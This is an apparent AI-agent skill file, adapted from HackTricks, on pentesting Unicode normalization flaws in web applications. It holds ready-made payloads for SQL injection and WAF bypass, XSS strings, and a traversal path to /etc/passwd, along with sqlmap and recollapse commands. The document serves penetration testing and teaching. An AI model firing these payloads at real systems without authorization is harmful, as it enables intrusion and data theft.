Hacktricks-skills unicode-normalization-pentest

How to identify and exploit Unicode normalization vulnerabilities in web applications. Use this skill whenever you're testing for SQL injection bypass, XSS, WAF evasion, or input validation issues that might be affected by Unicode normalization. Trigger this when you see reflected input, need to bypass character filters, or want to test for normalization-based security flaws. Don't forget to use this for any input validation testing, especially when the application echoes user input or uses regex-based filtering.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/pentesting-web/unicode-injection/unicode-normalization/SKILL.MD

source content

Unicode Normalization Pentesting

This skill helps you identify and exploit Unicode normalization vulnerabilities in web applications. These vulnerabilities occur when applications normalize Unicode input at different stages of processing, potentially bypassing security filters.

Quick Detection Test

Start with the Kelvin Sign test to detect if normalization is happening:

Send `KELVIN SIGN` (U+212A), URL-encoded as `%e2%84%aa`, to any input field
If the application echoes back a plain `K`, Unicode normalization is being performed
This indicates potential for normalization-based bypass attacks
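A minimal Python sketch of this probe, using only the standard library. The names `KELVIN_PROBE` and `classify_echo` are illustrative and not part of any tool; sending the request and extracting the reflected value are left to whatever HTTP client you use.

```python
import unicodedata
from urllib.parse import quote

KELVIN = "\u212a"                      # KELVIN SIGN
KELVIN_PROBE = quote(KELVIN).lower()   # percent-encoded UTF-8 bytes of the probe

def classify_echo(echoed: str) -> str:
    """Interpret the reflected value (not the whole page) for the Kelvin probe."""
    if KELVIN in echoed:
        return "unchanged"        # no normalization observed
    if "K" in echoed:
        return "normalized"       # U+212A was folded to ASCII K
    if "k" in echoed:
        return "case-folded"      # lowercasing also maps U+212A to k
    return "not reflected"

print(KELVIN_PROBE)
print({form: unicodedata.normalize(form, KELVIN)
       for form in ("NFC", "NFD", "NFKC", "NFKD")})
```

The Kelvin sign folds to `K` under all four normalization forms, which is why it works as a first probe: a positive result says normalization happens, but not yet which form.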

Understanding the Vulnerability

How It Works

Applications may normalize Unicode input at different processing stages:

Before filtering: Normalization happens first, then security filters run on the normalized text, so Unicode lookalikes are caught
After filtering: Filters run first, then normalization turns allowed characters into dangerous ASCII ones (the exploitable order)
Inconsistent normalization: Different parts of the app use different algorithms
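The difference between the first two orderings can be sketched in a few lines of Python. The blocklist and both function names are hypothetical stand-ins for a real WAF or validator, and NFKC is assumed as the backend's normalization form.

```python
import unicodedata

BLOCKED = {"'", '"', "<", ">"}

def is_clean(value: str) -> bool:
    """Toy blocklist filter standing in for a WAF or input validator."""
    return not any(ch in BLOCKED for ch in value)

def filter_then_normalize(value: str) -> str:
    """Exploitable order: the filter sees raw text, the backend sees ASCII."""
    if not is_clean(value):
        raise ValueError("blocked")
    return unicodedata.normalize("NFKC", value)

def normalize_then_filter(value: str) -> str:
    """Safer order: the filter inspects exactly what the backend will use."""
    normalized = unicodedata.normalize("NFKC", value)
    if not is_clean(normalized):
        raise ValueError("blocked")
    return normalized

payload = "\uff07 or 1=1-- "   # starts with FULLWIDTH APOSTROPHE (U+FF07)
print(repr(filter_then_normalize(payload)))   # passes the filter, ends up with a real quote
try:
    normalize_then_filter(payload)
except ValueError as exc:
    print("second ordering:", exc)
```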

The Four Normalization Forms

Form	Description	Use Case
NFC	Canonical composition	Most common default
NFD	Canonical decomposition	Breaks characters into base + combining
NFKC	Compatibility composition	Converts compatibility characters
NFKD	Compatibility decomposition	Full compatibility breakdown
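To see how the four forms differ on concrete characters, the sketch below runs Python's standard `unicodedata.normalize` over three samples. The sample set and the helper `normalize_all` are illustrative choices, not taken from the source.

```python
import unicodedata

FORMS = ("NFC", "NFD", "NFKC", "NFKD")

samples = {
    "KELVIN SIGN": "\u212a",
    "FULLWIDTH APOSTROPHE": "\uff07",
    "LATIN SMALL LETTER E WITH ACUTE": "\u00e9",
}

def normalize_all(text: str) -> dict:
    """Return the text under each of the four normalization forms."""
    return {form: unicodedata.normalize(form, text) for form in FORMS}

for name, ch in samples.items():
    # ascii() keeps non-ASCII results visible as escape sequences
    print(name, {form: ascii(out) for form, out in normalize_all(ch).items()})
```

The canonical forms (NFC, NFD) leave the fullwidth apostrophe untouched; only the compatibility forms (NFKC, NFKD) fold it to `'`. Payloads built from fullwidth, small, or superscript characters therefore depend on the target using a compatibility form.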

Attack Vectors

1. SQL Injection Filter Bypass

When applications filter dangerous characters but normalize afterward:

Target: Single quote `'` (0x27)

Unicode equivalent: `%ef%bc%87` (U+FF07 FULLWIDTH APOSTROPHE)

Payloads:

# Single quote injection (only the quote is replaced)
%ef%bc%87+or+1=1--+

# Unicode equivalents for every character (normalizes to: ' OR 1=1-- -)
%ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3

# Double quote variant
%ef%bc%82+or+1=1--+

# || operator variant (normalizes to: ' || 1==1//)
%ef%bc%87+%ef%bd%9c%ef%bd%9c+%c2%b9%e2%81%bc%e2%81%bc%c2%b9%ef%bc%8f%ef%bc%8f

Key Unicode Mappings:

'  → %ef%bc%87  (U+FF07 FULLWIDTH APOSTROPHE)
"  → %ef%bc%82  (U+FF02 FULLWIDTH QUOTATION MARK)
|  → %ef%bd%9c  (U+FF5C FULLWIDTH VERTICAL LINE)
/  → %ef%bc%8f  (U+FF0F FULLWIDTH SOLIDUS)
-  → %ef%b9%a3  (U+FE63 SMALL HYPHEN-MINUS)
=  → %e2%81%bc  (U+207C SUPERSCRIPT EQUALS SIGN)
1  → %c2%b9     (U+00B9 SUPERSCRIPT ONE)
#  → %ef%b9%9f  (U+FE5F SMALL NUMBER SIGN)
*  → %ef%b9%a1  (U+FE61 SMALL ASTERISK)
O  → %e1%b4%bc  (U+1D3C MODIFIER LETTER CAPITAL O)
R  → %e1%b4%bf  (U+1D3F MODIFIER LETTER CAPITAL R)
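The mappings can be applied mechanically. The following sketch builds a payload from an ASCII string and then shows what a backend would see, assuming it applies NFKC after URL decoding. `LOOKALIKES`, `encode_payload` and `server_view` are hypothetical names for this illustration. Note that U+1D3C and U+1D3F fold to uppercase `O` and `R`, which is harmless for case-insensitive SQL keywords.

```python
import unicodedata
from urllib.parse import quote_plus, unquote_plus

# ASCII character -> compatibility character that NFKC/NFKD folds back to it
LOOKALIKES = str.maketrans({
    "'": "\uff07", '"': "\uff02", "|": "\uff5c", "/": "\uff0f",
    "-": "\ufe63", "=": "\u207c", "1": "\u00b9", "#": "\ufe5f",
    "*": "\ufe61", "O": "\u1d3c", "R": "\u1d3f",
})

def encode_payload(ascii_payload: str) -> str:
    """Swap mapped characters for lookalikes, then percent-encode (spaces become +)."""
    return quote_plus(ascii_payload.translate(LOOKALIKES))

def server_view(encoded: str) -> str:
    """What a backend applying NFKC after URL decoding would see (an assumption)."""
    return unicodedata.normalize("NFKC", unquote_plus(encoded))

encoded = encode_payload("' OR 1=1-- -")
print(encoded)
print(server_view(encoded))
```

Percent-encoding is case-insensitive, so the uppercase hex digits produced by `quote_plus` are equivalent to the lowercase payloads listed in this section.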

2. XSS Bypass

Use Unicode characters that normalize to script-breaking characters:

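Example payloads:

# Plain payload, for comparison
<script>alert(1)</script>
# U+226E NOT LESS-THAN, percent-encoded UTF-8; NFD/NFKD decomposes it to "<" + U+0338
%e2%89%ae%3Cscript%3Ealert(1)%3C/script%3E
# The same character in the non-standard %u encoding
%u226e%3Cscript%3Ealert(1)%3C/script%3E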

Special K Polyglot:

%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83
# Normalizes to: Leonishan (requires a compatibility form, NFKC or NFKD)
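The two strings above can be checked offline with Python's `unicodedata`. The sketch shows the decomposition of U+226E and the folding of the styled string. `strip_marks` is a hypothetical helper modelling the common "remove accents" idiom; it is one way, assumed here, that the combining overlay could disappear and leave a bare `<`.

```python
import unicodedata
from urllib.parse import unquote

not_less_than = unquote("%e2%89%ae")   # U+226E NOT LESS-THAN
decomposed = unicodedata.normalize("NFD", not_less_than)
print([f"U+{ord(c):04X}" for c in decomposed])   # code points after decomposition

def strip_marks(text: str) -> str:
    """Decompose, then drop combining marks, as accent-stripping helpers often do."""
    return "".join(c for c in unicodedata.normalize("NFD", text)
                   if not unicodedata.combining(c))

styled = unquote("%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83"
                 "%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83")

print(strip_marks(not_less_than))
print(unicodedata.normalize("NFKC", styled))
```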

3. Regex Fuzzing

When regex validation normalizes input but the actual usage doesn't:

Use the recollapse tool:

# Generate variations of input to fuzz backend
pip install recollapse
recollapse "https://example.com/path"

Test for:

Open Redirect vulnerabilities
SSRF through URL validation bypass
Path traversal through normalized characters
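For a feel of what such fuzzing input looks like, here is a small Python sketch that swaps single characters for code points that fold back to them. It is not recollapse's algorithm, only an illustration of one idea behind it. The helper names and the restriction to the Basic Multilingual Plane and to NFKC are assumptions.

```python
import unicodedata
from collections import defaultdict

def build_reverse_map(form: str = "NFKC") -> dict:
    """Map each ASCII character to BMP characters that normalize to it."""
    reverse = defaultdict(list)
    for cp in range(0x80, 0x10000):
        if 0xD800 <= cp <= 0xDFFF:      # skip surrogate code points
            continue
        folded = unicodedata.normalize(form, chr(cp))
        if len(folded) == 1 and ord(folded) < 0x80:
            reverse[folded].append(chr(cp))
    return reverse

def variants(text: str, reverse: dict, per_char: int = 2):
    """Yield copies of text with exactly one character swapped for a lookalike."""
    for i, ch in enumerate(text):
        for alt in reverse.get(ch, [])[:per_char]:
            yield text[:i] + alt + text[i + 1:]

reverse = build_reverse_map()
for candidate in list(variants("https://example.com/path", reverse))[:5]:
    print(ascii(candidate))
```

Each variant differs from the original before normalization and equals it afterwards, which is the mismatch a regex check that normalizes only for validation would miss.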

4. Unicode Overflow

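If a server stores each character in a single byte (maximum value 255), larger code points are truncated and the overflow can produce an unexpected ASCII character:

Example: Code points that overflow to `A` (0x41):

`0x4e41` → `A`
`0x4f41` → `A`
`0x5041` → `A`
`0x5141` → `A`

Technique: Send characters whose code point ends in the byte value of your target character (code point mod 256 equals the target), not merely sequences whose last UTF-8 byte matches it.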
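The arithmetic behind the overflow is a single mask. The sketch below models a buggy conversion that keeps only the low 8 bits of a code point and generates candidates for a target character. Both function names and the default range of high bytes are assumptions for illustration.

```python
def truncate_to_byte(code_point: int) -> str:
    """Model a buggy conversion that keeps only the low 8 bits of a code point."""
    return chr(code_point & 0xFF)

def overflow_candidates(target: str, high_bytes=range(0x4E, 0x52)) -> list:
    """Characters whose code point ends in the target character's byte value."""
    return [chr((high << 8) | ord(target)) for high in high_bytes]

for ch in overflow_candidates("A"):
    print(hex(ord(ch)), "->", truncate_to_byte(ord(ch)))
```

Passing another target, for example `overflow_candidates("'")`, gives candidates for a filtered quote under the same truncation assumption.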

Testing Workflow

Step 1: Reconnaissance

Identify reflected parameters: Find input fields that echo back to output
Test Kelvin Sign: Send `%e2%84%aa` and check for `K` in response
Check normalization behavior: Compare responses with different Unicode forms

Step 2: Filter Analysis

Identify blocked characters: Test common dangerous characters (`'`, `"`, `<`, `>`, etc.)
Test Unicode equivalents: Replace blocked chars with Unicode variants
Check normalization timing: Determine if normalization happens before or after filtering
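The reasoning in this step can be written down as a small decision helper. The three observations are ones you collect manually for a single character, and the function name and verdict strings are hypothetical. Treat it as a sketch of the logic, not a detection tool.

```python
def classify_timing(ascii_blocked: bool, variant_blocked: bool,
                    variant_echoed_as_ascii: bool) -> str:
    """Infer filter/normalization order from three observations about one character."""
    if not ascii_blocked:
        return "not filtered: no bypass needed for this character"
    if variant_blocked:
        return "variant caught: normalization likely precedes the filter"
    if variant_echoed_as_ascii:
        return "bypass candidate: filter runs before normalization"
    return "variant passes unnormalized: no normalization on this path"

# Example: ' is blocked, U+FF07 is accepted and comes back as '
print(classify_timing(ascii_blocked=True, variant_blocked=False,
                      variant_echoed_as_ascii=True))
```

A blocked variant can also mean the filter lists the Unicode character explicitly, so a "variant caught" verdict is worth confirming with a second lookalike.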

Step 3: Exploitation

Craft payloads: Use Unicode equivalents for your attack vectors
Test with sqlmap: Use the Unicode template for automated testing
Manual verification: Confirm the vulnerability works as expected

Step 4: Verification

Confirm bypass: Verify the attack succeeds through normalization
Document findings: Record which Unicode forms work
Test edge cases: Try different normalization forms (NFC, NFD, NFKC, NFKD)

Tools and Resources

sqlmap Unicode Template

# Clone the template
git clone https://github.com/carlospolop/sqlmap_to_unicode_template
cd sqlmap_to_unicode_template

# Use with sqlmap
python sqlmap_to_unicode.py -u "http://target.com/page?id=1"

recollapse

# Generate input variations
pip install recollapse
recollapse "input_string"

Common Scenarios

WAF Bypass

When a WAF filters specific characters but the backend normalizes afterward:

# Original blocked payload
' OR 1=1--

# Unicode bypass
%ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3

Input Validation Bypass

When validation checks the raw input for specific patterns but the application normalizes it before use:

# Blocked: <script>
# Bypass: %e2%89%ae%3Cscript%3E

Path Traversal

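When path validation inspects the raw bytes but a lenient decoder later accepts overlong UTF-8 (`%c0%af` is an overlong encoding of `/`, an encoding trick rather than a normalization form):

# Normal: ../../../etc/passwd
# Unicode: ..%c0%af..%c0%af..%c0%afetc%c0%afpasswd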
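The bytes `C0 AF` used in this payload are an overlong two-byte UTF-8 encoding of `/`. A short Python sketch shows why a lenient decoder yields a slash while a strict one rejects the sequence. `naive_two_byte_decode` is a hypothetical model of a decoder that skips the overlong check, not code from any real server.

```python
def naive_two_byte_decode(b1: int, b2: int) -> str:
    """Decode a 2-byte UTF-8 sequence without rejecting overlong forms."""
    return chr(((b1 & 0x1F) << 6) | (b2 & 0x3F))

print(naive_two_byte_decode(0xC0, 0xAF))   # what a lenient decoder produces

try:
    bytes([0xC0, 0xAF]).decode("utf-8")    # Python's decoder is strict
except UnicodeDecodeError as exc:
    print("rejected by strict decoder:", exc.reason)
```

Because conforming decoders refuse the sequence, this vector only applies where decoding is done by legacy or hand-written code.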

Best Practices

Always test normalization: Include Unicode tests in your standard pentest workflow
Document normalization behavior: Record which forms the application uses
Test all input vectors: Forms, URLs, headers, cookies, JSON bodies
Consider encoding layers: URL encoding + Unicode encoding combinations
Check for inconsistent normalization: Different parts of the app may normalize differently